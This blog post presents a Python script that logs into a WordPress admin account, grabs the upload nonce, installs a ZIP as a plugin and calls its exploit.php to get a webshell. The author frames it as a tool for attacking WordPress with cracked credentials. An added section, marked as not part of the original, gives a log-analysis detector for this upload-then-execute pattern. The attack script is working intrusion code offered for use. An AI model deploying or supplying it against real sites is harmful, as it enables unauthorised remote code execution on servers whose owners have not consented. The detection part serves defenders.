I wrote a script that uploads a WordPress plugin

Posted at 2020-03-07

1. Purpose

When attacking WordPress, I wanted a handy script for uploading a WebShell, but I couldn't find one on the web, so I wrote one using the traffic of Metasploit's wp_admin_shell_upload module as a reference.

2. Code

wp_plugin_upload.py
#!/usr/bin/python
# coding: utf-8

import requests
import sys
import bs4

url = 'http://10.11.XX.XX'
loginUri = '/wp/wp-login.php'
adminUri = '/wp/wp-admin/'
pluginUri = '/wp/wp-admin/plugin-install.php?tab=upload'
uploadUri = '/wp/wp-admin/update.php?action=upload-plugin'
uploadFile = {'pluginzip': ('exploit_plugin.zip', open('exploit_plugin.zip', 'rb'), 'application/octet-stream', {'Content-Transfer-Encoding': 'binary'})}
exploitUri = '/wp/wp-content/plugins/exploit_plugin/exploit.php'

# Headers
headers = {'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)'}

try:
    # Session
    s = requests.Session()
    # wordpress_test_cookie is a cookie, not a request header
    s.cookies.set('wordpress_test_cookie', 'WP+Cookie+check')

    # Login
    loginData = {'log':'admin', 'pwd':'XXXX', 'redirect_to':url + adminUri, 'wp-submit':'Login', 'rememberme':'forever', 'testcookie':'1'}
    r = s.post(url + loginUri, data=loginData, headers=headers)
    r.raise_for_status()

    # Plugin Install Page
    r = s.get(url + pluginUri, headers=headers)
    r.raise_for_status()

    # Get Hidden Param _wpnonce 
    # <input id="_wpnonce" name="_wpnonce" type="hidden" value="fdccb03ee7"/>
    # <input name="_wp_http_referer" type="hidden" value="/wp/wp-admin/plugin-install.php?tab=upload"/>
    # <input id="pluginzip" name="pluginzip" type="file"/>
    # <input class="button" id="install-plugin-submit" name="install-plugin-submit" type="submit" value="Install Now"/>
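    bs4obj = bs4.BeautifulSoup(r.content, 'html5lib')
    wpnonce = bs4obj.find('input', id='_wpnonce')
    if wpnonce is None:
        # The upload form is missing from the response (e.g. the login failed)
        print('_wpnonce not found')
        sys.exit(1)
    # print(wpnonce['value'])

    # Zip Upload
    # The field name is _wp_http_referer, as in the form shown above
    multiPartData = {'_wpnonce':wpnonce['value'],
                 '_wp_http_referer':'/wp/wp-admin/plugin-install.php?tab=upload',
                 'install-plugin-submit':'Install Now'}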

    r = s.post(url + uploadUri, files=uploadFile, data=multiPartData, headers=headers)
    r.raise_for_status()

    # Exploit Run
    r = s.get(url + exploitUri)
    r.raise_for_status()

except requests.exceptions.RequestException as e:
    print(e)
    sys.exit(1)

print(r.status_code)
# print(r.text)

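3. Usage

Place the compressed ZIP file (exploit_plugin.zip) in the same folder as the script, and the script uploads it to the WordPress plugins folder. To run it, you need to have already obtained a WordPress account, for example by password cracking, and you rewrite the IP address and other values to suit your environment.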

$ python wp_plugin_upload.py

* Honestly, this is a pretty shabby script, so please treat it only as a reference.
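
Seen from the defending side, the request sequence in the script above leaves a recognizable trail in the web server access log: a POST to update.php?action=upload-plugin followed shortly by a direct request to a .php file under wp-content/plugins/ from the same client. The following is an added example, not part of the original article, that flags that pair; the log lines are constructed, and the combined log format, the function name and the 300-second window are assumptions.

```python
import re
from datetime import datetime, timedelta

# Apache/nginx "combined" access-log format is assumed.
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
UPLOAD_RE = re.compile(r'/wp-admin/update\.php\?(?:.*&)?action=upload-plugin')
PLUGIN_PHP_RE = re.compile(r'/wp-content/plugins/(?P<slug>[^/?]+)/[^?]*\.php(?:\?|$)')

def find_upload_then_exec(lines, window=timedelta(seconds=300)):
    """Return (ip, plugin_slug, uri) for every direct request to a plugin .php
    file made by a client within `window` after it uploaded a plugin ZIP."""
    last_upload = {}  # client ip -> time of its last successful upload POST
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the expected log format
        ts = datetime.strptime(m['ts'], '%d/%b/%Y:%H:%M:%S %z')
        ip, uri, status = m['ip'], m['uri'], int(m['status'])
        if m['method'] == 'POST' and UPLOAD_RE.search(uri) and status < 400:
            last_upload[ip] = ts
            continue
        hit = PLUGIN_PHP_RE.search(uri)
        if hit and ip in last_upload and timedelta(0) <= ts - last_upload[ip] <= window:
            findings.append((ip, hit['slug'], uri))
    return findings

# Constructed sample log (documentation IP ranges, User-Agent from the script above)
UA = '"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"'
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Mar/2020:10:00:01 +0900] "POST /wp/wp-login.php HTTP/1.1" 302 0 ' + UA,
    '192.0.2.10 - - [07/Mar/2020:10:00:02 +0900] "GET /wp/wp-admin/plugin-install.php?tab=upload HTTP/1.1" 200 9120 ' + UA,
    '192.0.2.10 - - [07/Mar/2020:10:00:03 +0900] "POST /wp/wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 5230 ' + UA,
    '192.0.2.10 - - [07/Mar/2020:10:00:04 +0900] "GET /wp/wp-content/plugins/exploit_plugin/exploit.php HTTP/1.1" 200 12 ' + UA,
    '198.51.100.7 - - [07/Mar/2020:10:05:00 +0900] "GET /wp/wp-content/plugins/akismet/akismet.php HTTP/1.1" 403 199 ' + UA,
]

if __name__ == '__main__':
    for finding in find_upload_then_exec(SAMPLE_LOG):
        print(finding)
```

The second client is not flagged because it never uploaded a plugin. Legitimate plugin installs by administrators also produce the upload POST, so the direct request to the new plugin's .php file is the part worth alerting on.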
